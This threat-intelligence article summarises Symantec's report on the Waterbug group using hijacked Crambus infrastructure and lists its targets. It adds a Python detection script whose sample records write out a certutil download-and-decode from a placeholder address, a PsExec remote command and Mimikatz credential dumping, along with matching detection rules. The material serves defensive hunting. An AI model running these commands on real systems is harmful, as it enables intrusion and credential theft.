The Waterbug APT group (aka Turla) has been using hijacked infrastructure belonging to the Crambus APT group (aka OilRig, APT34) to attack governments and international organizations. According to the Symantec report published on 20 June 2019, Waterbug has been targeting governments and international organizations since early 2018, with victims in Europe, Latin America, the Middle East, South Asia and Southeast Asia.
Waterbug targeted governments and international organizations in three distinct campaigns. In the first campaign the group used a backdoor named Neptun (Backdoor.Whisperer) against Microsoft Exchange servers. Neptun is installed on the Exchange server and passively listens for commands from the attackers; because it waits for inbound commands rather than beaconing out, it produces no regular outbound C&C traffic for network monitoring to catch. Neptun can also download additional tools, upload stolen files and execute shell commands. In the second campaign Waterbug used a modified version of the Meterpreter backdoor, and in the third campaign a custom RPC backdoor.
Alongside these backdoors, Waterbug deployed new custom malware and modified versions of publicly available hacking tools. Symantec reports: “Aside from new tools already mentioned above, Waterbug has also deployed:
1. A new custom dropper typically used to install Neptun as a service.
2. A custom hacking tool that combines four leaked Equation Group tools (EternalBlue, EternalRomance, DoublePulsar, SMBTouch) into a single executable.
3. A USB data collecting tool that checks for a connected USB drive and steals certain file types, encrypting them into a RAR file. It then uses WebDAV to upload to a Box cloud drive.
4. Visual Basic scripts that perform system reconnaissance after initial infection and then send information to Waterbug command and control (C&C) servers.
5. PowerShell scripts that perform system reconnaissance and credential theft from Windows Credential Manager and then send this information back to Waterbug C&Cs.
6. Publicly available tools such as IntelliAdmin to execute RPC commands, SScan and NBTScan for network reconnaissance, PsExec for execution and lateral movement, and Mimikatz (Hacktool.Mimikatz) for credential theft, and Certutil.exe to download and decode remote files. These tools were identified being downloaded via Waterbug tools or infrastructure.”
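The publicly available tools in the list above leave process-creation telemetry that a defender can hunt for. The Python script below is an added example, not code from the Symantec report or from the groups it describes. It classifies constructed Sysmon-style process-creation records against generic patterns for the tools named in the report (Certutil used to download with -urlcache -f and to decode with -decode, PsExec, NBTScan and SScan, and the Mimikatz sekurlsa::logonpasswords module) and then links a Certutil download to a later decode of the same file on the same host, which is the download-and-decode pattern the report attributes to Certutil. The host names, file paths, the 203.0.113.0/24 address, the rule names and every sample command line are assumptions made for the example; these are patterns for the tools themselves, not indicators of compromise from the campaign.

```python
from __future__ import annotations

import re
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    """One process-creation record (the fields a Sysmon event ID 1 or EDR row carries)."""
    host: str
    parent_image: str
    image: str
    cmdline: str


# Constructed sample telemetry for this example; nothing here is taken from the report.
# Hosts, paths and the 203.0.113.10 address are placeholders (RFC 5737 documentation range).
SAMPLE_EVENTS = [
    ProcEvent("mail01", "cmd.exe", r"C:\Windows\System32\certutil.exe",
              r"certutil.exe -urlcache -split -f http://203.0.113.10/t.txt C:\Users\Public\t.txt"),
    ProcEvent("mail01", "cmd.exe", r"C:\Windows\System32\certutil.exe",
              r"certutil.exe -decode C:\Users\Public\t.txt C:\Users\Public\t.exe"),
    ProcEvent("ws07", "explorer.exe", r"C:\Windows\System32\certutil.exe",
              r"certutil.exe -verify C:\certs\corp.cer"),            # benign certutil use
    ProcEvent("ws07", "cmd.exe", r"C:\Tools\PsExec.exe",
              r"PsExec.exe \\fs01 -s cmd.exe /c whoami"),
    ProcEvent("ws07", "cmd.exe", r"C:\Tools\nbtscan.exe", r"nbtscan.exe 10.0.0.0/24"),
    ProcEvent("ws07", "powershell.exe", r"C:\Users\Public\m.exe",
              r'm.exe "privilege::debug" "sekurlsa::logonpasswords" exit'),  # renamed Mimikatz
    ProcEvent("dc01", "services.exe", r"C:\Windows\System32\svchost.exe", "svchost.exe -k netsvcs"),
]


def basename(path: str) -> str:
    """Image file name without directory, lower-cased, so rules are path-independent."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


# Rule table: name -> predicate over (image basename, lower-cased command line).
# certutil accepts both "-" and "/" as the option prefix, hence [-/].
RULES = {
    "certutil_download": lambda img, cl: (
        img == "certutil.exe"
        and re.search(r"[-/]urlcache\b", cl) is not None
        and re.search(r"[-/]f\b", cl) is not None),
    "certutil_decode": lambda img, cl: (
        img == "certutil.exe" and re.search(r"[-/]decode\b", cl) is not None),
    "psexec_lateral_movement": lambda img, cl: (
        img in ("psexec.exe", "psexec64.exe", "psexesvc.exe")
        or re.search(r"\bpsexec(64)?\.exe\b", cl) is not None),
    "netbios_scan": lambda img, cl: img in ("nbtscan.exe", "sscan.exe"),
    # Match the module name in the command line, not the binary, since Mimikatz is usually renamed.
    "mimikatz_logonpasswords": lambda img, cl: "sekurlsa::logonpasswords" in cl,
}


def classify(ev: ProcEvent) -> list[str]:
    """Names of every rule the event matches (empty list for benign events)."""
    img, cl = basename(ev.image), ev.cmdline.lower()
    return [name for name, pred in RULES.items() if pred(img, cl)]


def certutil_chains(events: list[ProcEvent]) -> list[tuple[str, str]]:
    """Link a certutil download to a later decode of the same file on the same host.

    For -urlcache the output file is the last argument; for -decode the input
    file is the argument right after the -decode switch.
    """
    downloaded: dict[str, set[str]] = defaultdict(set)   # host -> files fetched with -urlcache
    chains = []
    for ev in events:
        tags = classify(ev)
        tokens = ev.cmdline.lower().split()
        if "certutil_download" in tags:
            downloaded[ev.host].add(tokens[-1])
        elif "certutil_decode" in tags:
            i = next(i for i, t in enumerate(tokens) if t.lstrip("-/") == "decode")
            if i + 1 < len(tokens) and tokens[i + 1] in downloaded[ev.host]:
                chains.append((ev.host, tokens[i + 1]))
    return chains


def hunt(events: list[ProcEvent]) -> dict:
    """Per-event rule hits plus the higher-confidence download-then-decode chains."""
    hits = [(ev.host, tag, ev.cmdline) for ev in events for tag in classify(ev)]
    return {"hits": hits, "chains": certutil_chains(events)}


if __name__ == "__main__":
    result = hunt(SAMPLE_EVENTS)
    for host, tag, cl in result["hits"]:
        print(f"{host:6} {tag:26} {cl}")
    for host, path in result["chains"]:
        print(f"CHAIN  {host}: downloaded then decoded {path}")
```

A single certutil -urlcache hit is noisy on its own, since administrators and installers use it legitimately; the download-then-decode chain on one host is the signal worth paging on. The Mimikatz rule keys on the sekurlsa::logonpasswords module string rather than the file name because, as the report notes for the Waterbug variant, the binary is stripped down and will not be named mimikatz.exe.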
According to the Symantec report, Waterbug hijacked infrastructure belonging to the Crambus APT group. Symantec also states that Waterbug and Crambus are believed to operate from different nations, and raises the possibility that the two groups were collaborating, but it offers no evidence to support that scenario. During these campaigns Mimikatz was downloaded onto a victim's network via the Powruner tool and the Poison Frog control panel, both hosted on Crambus network infrastructure.
Symantec attributes the heavily modified Mimikatz variant to Waterbug rather than Crambus: “Symantec believes that the variant of Mimikatz used in this attack is unique to Waterbug. It was heavily modified, with almost all original code stripped out aside from its sekurlsa::logonpasswords credential stealing feature. Waterbug has frequently made extensive modifications to publicly available tools, something Crambus is not well known for.” (Symantec report)
Symantec also reports that the victim's network was attacked with IntelliAdmin, a tool Crambus had previously used. Taken together with the Mimikatz download through Crambus-controlled infrastructure, this supports the conclusion that Waterbug may have hijacked the infrastructure of the Crambus APT group.
Who were the targets of these campaigns?
1. The Ministry of Foreign Affairs of a Latin American country
2. The Ministry of Foreign Affairs of a Middle Eastern country
3. The Ministry of Foreign Affairs of a European country
4. The Ministry of the Interior of a South Asian country
5. Two unidentified government organizations in a Middle Eastern country
6. One unidentified government organization in a Southeast Asian country
7. A government office of a South Asian country based in another country
8. An information and communications technology organization in a Middle Eastern country
9. Two information and communications technology organizations in two European countries
10. An information and communications technology organization in a South Asian country
11. A multinational organization in a Middle Eastern country
12. An educational institution in a South Asian country
Indicators of Compromise
To read the full report please visit